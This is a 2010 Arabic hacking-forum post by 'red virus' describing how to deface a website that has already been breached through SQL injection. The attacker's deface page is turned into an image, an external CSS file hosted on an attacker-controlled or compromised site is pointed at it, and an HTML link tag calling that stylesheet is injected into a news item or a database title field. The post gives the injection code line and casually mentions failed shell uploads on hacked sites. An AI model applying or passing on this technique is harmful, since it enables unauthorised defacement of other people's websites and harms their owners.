عرض مشاركة واحدة
قديم 08-28-2010, 09:39 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
الشبح المرح
 
الصورة الرمزية الشبح المرح
 

 

 
إحصائية العضو






الشبح المرح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الشبح المرح is on a distinguished road

افتراضي Bypass Permission index تخطي تصاريح الأندكس عبر القاعدة او لوحة التحكم


السلام عليكم ورحمة الله وبركاته

ازيكم جميعا

جايب لكم طريقة حلوة لتعليق الاندكس

اوقات كتير مثلا بنخترق موقع من ثغرة سيكول بندخل لوحة التحكم مش بنلاقى تحكم فى الاستايلات

او مش بنعرف نرفع شيل

ومش بنلاقى طريقة نعلق بيها الاندكس بتاعنا

فجايب لكم طريقة حلوة تقدر تعلق بيها الاندكس كاملة من خلال اى خبر

اول حاجة نحمل الملف اللى فى المرفق بأسم css2.css

ونروح للاندكس بتاعتنا ناخد لها برنت سكرين نخليها شكل صورة

ونرفع الصورة على موقعنا او اى موقع مجانى او اى موقع احنا مخترقينه

المهم بعد ما نعمل الاندكس على هيئة صورة هنفتح ملف css2.css ونعدل فيه الرابط



نحط مكانه رابط الصورة بتاعتنا

بعدين نرفع css2.css على موقعنا او اى موقع مجانى او اى موقع احنا مخترقينه

وناخد الرابط بتاعه

ونروح من لوحة التحكم نكتب اى خبر او اى عنوان ونحط الكود دا
red.com/red.jpg

كود PHP:
<head><link href=http://www.red.com/css2.css type=****/css rel=stylesheet>;--</head> 

طبعا هنغير red.com/css2.css برابط الموقع اللى رفعنا عليه ملفنا

وندوس حفظ ونروح نشوف فى الموقع هنلاقى صفحة سودا كاملة ومش ظاهر غير الاندكس بتاعتنا اللى عملناها صورة


ونفس الحركة ممكن نعملها من قاعدة البيانات نعدل على اى عنوان خبر title

ونحط الكود

الكود مرفق بردو عشان الحماية مطلعة نجوم فى الكود

لحد هنا انتهى الشرررررررررح

فى امان الله



الحقوق ل red virus




Bypass Permission index jo'd jwhvdp hgHk];s ufv hgrhu]m h, g,pm hgjp;l

الملفات المرفقة
نوع الملف: zip css2.zip‏ (418 بايت, المشاهدات 12)
نوع الملف: txt code.txt‏ (98 بايت, المشاهدات 8)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع







 

   

رد مع اقتباس